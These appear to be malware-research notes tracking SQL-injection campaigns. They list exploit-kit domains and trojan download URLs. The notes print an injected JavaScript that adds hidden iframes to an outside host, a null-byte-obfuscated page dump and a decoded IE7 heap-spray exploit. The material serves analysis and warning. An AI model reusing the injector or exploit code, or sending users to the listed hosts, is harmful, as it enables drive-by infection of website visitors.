this injected script also has several associated domains

• dd45h.8866.org/fkzd/16.htm
• wm.1kfie.cn/x150/xx.html

One of the exploit downloads a rootkit from d.cdwsx.com/xx/x150.css [VT Analysis]

active sql-injection attack.

Injected scripts and exploits iframe to several urls such as:

• www.gehae.info/fox/index.html
• www.haerh.info/mam.exe

the scripts generate some form of ‘time-based’ parameters that probably is only available for a brief period.

The trojan downloader from www.haerh.info get a list of evil programs from www.gehae.info/2.txt

another round of sql-injection attacks.

x.js calls iframe src www.jejsaj.com/ya/index.html

jejsaj contains various exploits targeting among others

• owc 0-day
• realplayer
• msvidctl.dll

the exploits download trojans from www.wowand.com

another round of sql-injection attempt

Update: beware of this malicious script as it is making use of OWC 0-day.
Ref – http://isc.sans.org/diary.html?storyid=6811

a recent round of sql-injected link.
a.js links in more iframes which exploits the typical basket of exploits, targeting flash, IE7, snapshot viewer, realplayer, etc.

Ultimately the exploits installs a trojan [VT analysis]

This sql-injected script src has been around for some time.

The interesting point of this script is that it behaves differently if the injected site is from “.gov.cn” or “.edu.cn”. Code as shown below:

var s,siteUrl,tmpdomain;
var arydomain = new Array(".gov.cn",".edu.cn");
s = document.location+"";
siteUrl=s.substring(7,s.indexOf('/',7));
tmpdomain = 0;
for(var i=0;i<arydomain.length; i++)
{
if(siteUrl.indexOf(arydomain[i]) > -1){
tmpdomain = 1;
break;
}
}
if(tmpdomain == 0){
document.writeln("<iframe src=http://33sf54.cn/sina/a100.htm width=0 height=0></
iframe>");
function rl()
{
var msgObj = document.createElement("div");
msgObj.setAttribute("id","msgDiv");
document.body.appendChild(msgObj);
var obj = document.getElementById("msgDiv");
obj.innerHTML ="<iframe src=http://33sf54.cn/sina/a100.htm width=0 height=0></
iframe>";
}
setInterval("rl()",10000);
}

The injected iframe a100.htm inserts another iframe au.htm.

au.htm deploys another obfuscation technique, which is to embed null bytes into the file. The top portion of the file is as shown:

00000000  3c 00 00 68 00 74 00 6d  6c 3e 00 00 0d 0a 00 00  |<..h.t.ml>......|
00000010  3c 00 00 73 00 00 63 72  00 69 00 00 70 00 00 74  |<..s..cr.i..p..t|
00000020  00 3e 00 00 0d 00 00 0a  69 00 00 66 00 28 00 6e  |.>......i..f.(.n|
00000030  00 00 61 76 00 69 00 67  61 00 74 00 6f 72 2e 00  |..av.i.ga.t.or..|
00000040  00 75 00 00 73 00 65 00  00 72 00 00 41 67 00 00  |.u..s.e..r..Ag..|
00000050  65 00 00 6e 74 00 2e 74  00 00 6f 00 00 4c 6f 00  |e..nt..t..o..Lo.|
00000060  77 65 72 00 00 43 61 73  65 00 28 29 00 00 2e 00  |wer..Case.()....|

If all the bytes 00 are removed, you get back a beautiful html file.

au.htm contains links to exploits of typical vulnerabilities. One malicious file that will be downloaded is http://xia8866.com/xia/f5.css [Threatexpert result]

following previous post, a new injected script has emerged that resolves to same IP.

v.js retrieves another iframe src www.vieio.cn/i.htm.

This exploitation kit tries to avoid detection by splitting each respective exploit into 2 files. One .htm and .js

This sql-injected script calls iframe www.gomne.cn/yh.htm

yh.htm has the same vulnerability exploits as the previous post. Most likely from the same kit.

The exploits download malicious executable from www.at820.cn/wins.exe [VT results]

CWSandbox analysis of wins.exe shows further download such as rootkit www.at820.cn/ie.exe [VT results]

Note that all 3 domains tsnse.cn, www.gomne.cn and www.at820.cn resolve to the same IP address 120.50.35.138.

this is a new script that are being sql-injected.

z.js contains a iframe from www.893500.cn/2/index.htm

The index.htm contains links to several the typical variety of exploits. One of which 02.htm is a MS09-02 exploit.

The IE7 exploit is decoded as follows:

var b=unescape(“%”+”u”+”0″+”C”+”0″+”C”+”%”+”u”+”0″+”C”+”0″+”C”);
var test99=yumen;
var yumen=new Array();
Tameeeeee=unescape(ttt.replace(/Game/g,”\x25\x75″));
while(b.length<0×100000-(ttt.length*2+0×01020)/2){b+=b}var lh=b.substring(0,0×100000-(ttt.length*2+0×01020)/2);
for(i=0; i<0xC0; i++){yumen[i]=lh+Tameeeeee}CollectGarbage();
var s1=unescape(“%”+”u”+”0″+”b”+”0″+”b”+”%”+”u”+”0″+”b”+”0″+”b”+”kfkfkfkfkfkfkfkfkfkfkfkfk”);
var a1=new Array();
for(var x=0; x<1000; x++)a1.push(document.createElement(“img”));
function ok(){o1=document.createElement(“tbody”);
o1.click;
var o2=o1.cloneNode();
o1.clearAttributes();
o1=null;
CollectGarbage();
for(var x=0; x<a1.length; x++)a1[x].src=s1; o2.click}

this sql-injected URL contains iframes to www.advpoints.com.
Seems to be profiting thru referrals rather than injecting malware.